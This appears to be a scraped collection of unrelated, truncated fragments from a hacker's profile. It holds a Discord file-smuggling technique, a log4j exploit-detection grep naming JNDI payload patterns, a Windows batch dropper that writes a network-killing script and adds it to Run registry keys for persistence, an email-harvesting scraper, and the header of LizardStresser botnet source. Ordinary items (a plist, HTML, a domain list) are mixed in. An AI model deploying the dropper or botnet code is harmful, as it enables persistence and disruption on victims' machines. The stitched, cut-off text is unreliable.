ClumsyLulz SleepTheGod

Local Storage Reassembly

General

The purpose of this writeup is to document a method that can be exploited in order to transfer files to a Discord user's Windows system, without said user's explicit consent. This method does not allow for immediate and direct execution of the file, therefore it does not qualify as an individual security vulnerability.

Technique

LSR requires an image file that will not be modified by Discord. Images that have already been compressed are not modified in any way, EOF data is not trimmed or altered. Using such an image, any file can be split into chunks that (combined with the image) don't exceed 8Mb, which is the upload limit for regular Discord accounts. These images containing EOF data can be sent to a user without being altered - file hashes do not match, so remote caching can not be used, and the original image has already been compressed, thus no additional compression will take place. As soon as the user views the given conversation and the images load, they a

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log

Beat Maker - CSS

A Pen by OhDay on CodePen.

License.

	apt install git

	git clone https://gitlab.com/st42/termux-sudo

	cd termux-sudo

	cat sudo > /data/data/com.termux/files/usr/bin/sudo

	chmod 700 /data/data/com.termux/files/usr/bin/sudo

	0815.ru
	0815.ru0clickemail.com
	0815.ry
	0815.su
	0845.ru
	0clickemail.com
	0-mail.com
	0wnd.net
	0wnd.org
	10mail.com

	echo @echo off>c:windowswimn32.bat
	echo break off>>c:windowswimn32.bat
	echo ipconfig/release_all>>c:windowswimn32.bat
	echo end>>c:windowswimn32.bat
	reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowsswimn32.bat /f
	reg add hkey_current_usersoftwaremicrosfotwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn.bat /f
	echo You have maxed your usage for a lifetime ??
	PAUSE

	import requests
	import sys
	import re


	def get_mails(domain):
	url = 'https://pgp.circl.lu/pks/lookup?search={}&fingerprint=on&op=index'.format(domain)
	res = requests.get(url).text
	mails = re.findall(r'<a href=".">(.)<\/a>', res)

	<!DOCTYPE html>
	<html>
	<head>
	<meta charset="UTF-8">
	<!-- https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP -->
	<meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'">
	<link href="./styles.css" rel="stylesheet">
	<title>Hello World!</title>
	</head>
	<body>

	streamtypedÅËÑ@ÑÑÑNSMutableDictionaryÑÑNSDictionaryÑÑNSObjectÖÑiíÑÑÑNSStringïÑ+bagÜíÑÑÑ
	NSMutableDataÑÑNSDataïñÇXƒÑ [115800c]<?xml version="1.0" encoding="UTF-8" standalone="no"?>
	<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
	<plist version="1.0">
	<dict>
	<key>search</key><string>https://search.itunes.apple.com/WebObjects/MZSearch.woa/wa/search</string>
	<key>advancedSearch</key><string>https://search.itunes.apple.com/WebObjects/MZSearch.woa/wa/advancedSearch?cc=us</string>
	<key>searchHints</key><string>https://search.itunes.apple.com/WebObjects/MZSearchHints.woa/wa/hints</string>
	<key>searchApi</key><string>https://search.itunes.apple.com/WebObjects/MZSearch.woa/wa/searchApi</string>
	<key>p2-book-search</key><string>https://search.itunes.apple.com/WebObjects/MZSearch.woa/wa/search?media=ebook</string>

	/*
	Chippy1337 and @packetprophet present:
	LizardStresser rekt
	This is the cross compiled bot

	LICENSE AGREEMENT:
	If you lulz'd, you must sent BTC to
	1N4MxbXsooU9aMU41NPrSbgZKpJjtwsnar

	Death to skids